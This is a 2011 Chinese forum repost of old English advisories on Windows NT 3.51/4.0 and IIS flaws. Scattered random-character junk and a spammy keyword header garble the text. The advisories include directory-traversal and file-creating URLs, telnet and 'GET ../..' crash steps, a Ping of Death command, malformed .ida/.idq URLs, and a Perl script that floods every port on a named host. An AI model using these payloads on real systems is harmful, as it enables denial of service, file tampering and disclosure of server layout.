天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0. R: V5 ?+ @6 S# A# F+ Y, j( G
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.3 t4 B, f* E- A9 B9 I& S9 e

      # w: f' V, Z4 KA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      % K% y0 t9 A9 j; e! p3 @% G$ R6 Q; ~5 t3 U8 ]
      By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.+ W7 M& r1 h! ]+ O7 R' @
      ' x/ M2 ]! ~8 s) B
      --------------------------------------------------------------------
      - G8 a* |. N: U* ?" N$ W
      4 J; _) v) Z& B$ w受影響系統(tǒng):4.0  O/ n4 D4 t* E$ k' w& [/ I* m
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.! V- O4 r5 _8 T

      % z. W: V8 Q! n6 [& j4 R+ y/ xIf the file 'target.bat' exists, the file will be truncated.0 I2 E# B2 w- F
      8 V( v- I/ Q2 g  ^

      5 @! J6 |3 ^$ xA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.! Z+ T. _8 u8 O+ o9 T  K( g
      ; e8 M+ f' V( ], K7 b- w( e
      ----------------------------------------------------------------------6 @$ n  X( ~6 G0 r/ i+ C: x8 J
      ) z0 ?5 d' \% C/ b& G/ N$ Q
      受影響系統(tǒng):3.51,4.08 g( Y, n4 u* x+ U
      Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.' i- O5 J& `+ v: c1 A4 {
      & d, j8 O8 Q( a4 F: _: u. |- q
      The following steps;5 p, a( o7 `9 P9 w( j- Z

      & V3 x* x4 w/ A$ @" a- kTelnet to an NT 4.0 system on port 135
      - ]% L; S. o) E$ \, Z" Z  ?Type about 10 characters followed by a <CR> - L5 l! E5 [5 g9 D3 Z: ^# l9 U
      Exit Telnet
      0 K1 t+ N! _1 R% W7 O0 e8 uresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.( r8 }% B6 d/ j0 o
      ; `# N! U* k5 k" K
      When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.' f3 i/ c" J0 G: k; l+ B
      , [) E$ m' z3 K: _
      The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      - X4 G$ t8 J& [$ R; ?
      3 N& h3 ~8 t" s* M2 s) Y0 J5 qIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      ! X* R2 R4 v! q) Z
      $ d1 t" t% J0 t& O7 m( p0 JThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      % n. X8 X2 R* i1 x' |
      3 ?/ l, q( a, I/ Z8 T/*begin poke code*/
      # C& ^. h8 }) Z% Q7 g5 `- Y2 o5 a+ G1 d" d5 l% t* J3 Y
      use Socket;
      ) o( l; p6 N( u) Fuse FileHandle;+ @& ^0 z; ?# B% c
      require "chat2.pl";% p4 H, G! ]# L
      7 B. }, E; r* _' M
      $systemname = $ARGV[0] && shift;* Y/ d6 F& d& E; y3 j8 ?

      4 c! f+ k% F+ r/ a. y) [5 _* D$verbose = 1; # tell me what you're hitting
      # b$ W& \( s  ?. {7 {3 C$knownports = 1; # don't hit known problem ports1 A2 ~- R0 P( X
      for ($port = $0; $port<65535; $port++) + R  L5 y, p, I( P( j* u  H
      {) \5 b$ z. I& c* O  J7 k- }" U

      3 Q. h0 E& [: x5 k2 `
      7 h7 w* p7 ?; N; @; Kif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
      ! g; F( G! M6 F' N$ y; r7 xnext;
      $ ^! w  y5 \3 M. u! Y9 K( z' K}
      ; p+ f% {9 C0 {, ?+ k9 v$fh = chat::open_port($systemname, $port);
      ; H% ?: }( ~# a1 t. G9 ~0 Schat::print ($fh,"This is about ten characters or more");1 T" e* ?, ]: p& H' p; m' r( w
      if ($verbose) {* R3 [1 c( w+ h5 {+ n) g7 H
      print "Trying port: $port\n";8 D2 |* G" k8 k8 E
      }
      3 L$ E, x. b2 s0 b% Lchat::close($fh);# r! P/ u& f# E# ^9 a

      : B, c% K9 v3 h# [' w! s5 G3 \}
      3 N' ?% W( d) q. ]( |. k* V9 n; I( t* g$ m  p. r' d
      7 Q! m/ t' T1 i$ g1 H
      /*end poke code*/
      3 |( t+ D7 s3 C3 ~2 Q
      5 s; t" j% B* bSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername, W7 Z3 r, ~! n& y1 M& P% f

      2 w1 k! J3 K4 |+ ]8 D  }) y--------------------------------------------------------------------------------
      ! h" N8 O9 @; Q: {! [4 k/ ?
      - ~- d" @& W! ~4 {- |& }受影響系統(tǒng):4.0) p' \# c  P. O
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.* o6 j% N9 V( z; Z

      3 \( J6 N5 w$ A' U! u% ^% XThis attack causes Dr. Watson to display an alert window and to log an error: $ B- \: E' S/ m" j

      6 j. J9 d0 L, ~# z7 P"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      ' W1 i6 f$ Q1 ~6 c% Y! q( t6 B
      --------------------------------------------------------------------------------4 Y# m: Y* j, w, [' |/ U) X' `5 q. K4 @' _
      . W& [/ r' @7 M" C& g
      受影響系統(tǒng):3.51,4.02 C! t5 ~% X8 y+ h' Y' ^
      Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
      0 P% {, f& X% S' y# j, ^0 [
      4 l: O- D, o! A* y: U0 X  Y$ @STOP: 0X0000001E
      0 f: |0 I9 ~# a5 K+ a: FKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      2 n. z/ Q* C" ?( m6 ]4 Y' j1 k$ @/ A+ Y  A
      -OR-. |( ]- C' G( y+ ?( b

      ) u0 ^2 p$ j6 f% M' ~5 ZSTOP: 0x0000000A
      # ?$ a7 b5 ]3 E. d$ bIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
      3 u1 D( |( C0 [$ M) ~
      ! o7 @6 r. m( v9 ^) [NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      " X7 Q" B1 c) v; J+ c( ^0 I* v
      , D; x* @" O4 `3 O! y* H--------------------------------------------------------------------------------
      # s& {. [- T( v3 ]4 N& |  b' ]  r* ]7 b
      Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ! K: S* S% f. x: z& C7 M" G

      ' f6 b: p6 U# }# H4 F--------------------------------------------------------! e% x6 N. W/ N
        s5 t2 j/ z" t6 M4 C
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-6-28 03:30

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表